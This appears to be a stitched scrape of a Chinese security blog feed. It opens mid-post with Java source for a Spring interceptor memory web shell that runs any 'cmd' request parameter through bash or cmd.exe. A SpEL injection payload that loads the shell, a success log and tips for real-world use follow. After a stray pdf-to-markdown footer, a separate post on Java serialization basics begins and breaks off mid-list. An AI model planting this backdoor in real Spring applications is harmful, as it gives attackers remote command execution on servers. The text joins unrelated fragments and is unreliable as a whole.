context.getBean(RequestMappingHandlerMapping.class); Field field = null; try { field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors"); } catch (NoSuchFieldException e) { e.printStackTrace(); } field.setAccessible(true); List adaptInterceptors = null; try { adaptInterceptors = (List) field.get(mappingHandlerMapping); } catch (IllegalAccessException e) { e.printStackTrace(); } InceptorMemShell evilInterceptor = new InceptorMemShell(); adaptInterceptors.add(evilInterceptor); System.out.println("ok"); }</p> <p>@Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { String cmd = request.getParameter("cmd"); if (cmd != null) { try { response.setCharacterEncoding("gbk"); java.io.PrintWriter printWriter = response.getWriter(); ProcessBuilder builder; String o = ""; if (System.getProperty("os.name").toLowerCase().contains("win")) { builder = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd}); } else { builder = new ProcessBuilder(new String[]{"/bin/bash", "-c", cmd}); } java.util.Scanner c = new java.util.Scanner(builder.start().getInputStream(),"gbk").useDelimiter("wocaosinidema"); o = c.hasNext()? c.next(): o; c.close(); printWriter.println(o); printWriter.flush(); printWriter.close(); } catch (Exception e) { e.printStackTrace(); } return false; } return true; }</p> <p>@Override public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception { HandlerInterceptor.super.postHandle(request, response, handler, modelAndView); }</p> <p>@Override public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception { HandlerInterceptor.super.afterCompletion(request, response, handler, ex);</p> <h3>然后在内存马同目录下，写如下代码来获取Base64加密的恶意类字节码</h3> <h3>注意，如果要HTTP请求的方式发包，就要把+号这种会被解析为空格的符号URL编码为%2b，否则会报错%20无法被Base64解析</h3> <h3>最后的payload形如</h3> <h3>这里比较复杂，如果内存马打成功了，则会在后台报错，在实战中，把start和ok的System.out删除即可</h3> <h4>}</h4> <pre><code>@Override public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } } import com.sun.org.apache.bcel.internal.Repository; import java.io.IOException; import java.util.Base64; public class ClasstoBase64 { public static void main(String[] args) throws IOException { byte[] encode = Base64.getEncoder().encode(Repository.lookupClass(InceptorMemShell.class).getBytes()); System.out.println(new String(encode).replace("+","%2b")); } } payload=T(org.springframework.cglib.core.ReflectUtils).defineClass('InceptorMemShell',T(org.springframework.ut il.Base64Utils).decodeFromString('yv66vgAAA......AEAiAAAAAIAiQ=='),new javax.management.loading.MLet(new java.net.URL[ 0 ],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance() start ok 2025 - 02 - 27 09 : 26 :27.068 ERROR 5696 --- [p-nio- 80 - exec- 7 ] o.a.c.c.C.[.[.[/].[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.ClassCastException: InceptorMemShell cannot be cast to java.lang.String] with root cause </code></pre> <h3>最后访问任意路由即可，传参则为cmd</h3> <p>This is a offline tool, your data stays locally and is not send to any server!</p> <p><a href="https://github.com/jzillmann/pdf-to-markdown/issues">Feedback &amp; Bug Reports</a></p> https://origin618.github.io/posts/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%BA%8F%E5%88%97%E5%8C%96/https://origin618.github.io/posts/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%BA%8F%E5%88%97%E5%8C%96/反序列化与序列化Sun, 05 Oct 2025 00:00:00 GMT<h2>反序列化与序列化基础</h2> <p>先写一个Person类</p> <pre><code>public class Person implements java.io.Serializable{ private String name; private int age; public Person() { } public Person(String name, int age) { this.name = name; this.age = age; } @Override public String toString() { return "Person{" + "name='" + name + '\'' + ", age=" + age + '}'; } } </code></pre> <p>再写一个SerializationTest</p> <pre><code>import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; public class SerializationTest { public static void serialize(Object obj) throws IOException { ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static void main(String[] args) throws Exception { Person person = new Person("aa", 22); System.out.println(person); // SerializationTest.serialize(person); } } </code></pre> <p>这是一个非常硬核且关键的 Java 机制问题！</p> <p><strong>简单的回答是：这是 Java 序列化规范的强制规定。JVM 在反序列化时，只认 <code>private</code> 签名的 <code>readObject</code> 方法。如果是 <code>public</code>，它就不认了，直接忽略你的代码。</strong></p> <p>让我们深入到底层，看看为什么会这样：</p> <h3>1. “魔法方法”的严格签名</h3> <p>在 Java 的 <code>Serializable</code> 接口定义中，<code>readObject</code> 被设计为一个<strong>回调方法（Callback）</strong>。</p> <p>当 <code>ObjectInputStream</code> 试图反序列化一个对象时，它会通过**反射（Reflection）**机制去检查这个类有没有定义一个“特殊”的方法来处理反序列化逻辑。</p> <p>Java 官方文档和源码对这个“特殊”方法的签名要求极其严格，必须<strong>一字不差</strong>：</p> <p>Java</p> <pre><code>private void readObject(java.io.ObjectInputStream stream) throws IOException, ClassNotFoundException; </code></pre> <p>注意那个 <strong><code>private</code></strong>。</p> <h3>2. 为什么 <code>public</code> 不行？</h3> <p>当你把它改成 <code>public void readObject(...)</code> 时：</p> <ol> <li><strong>反射查找失败（或被跳过）：</strong> <code>ObjectInputStream</code> 在内部逻辑中（具体是在 <code>ObjectStreamClass</code></li> </ol>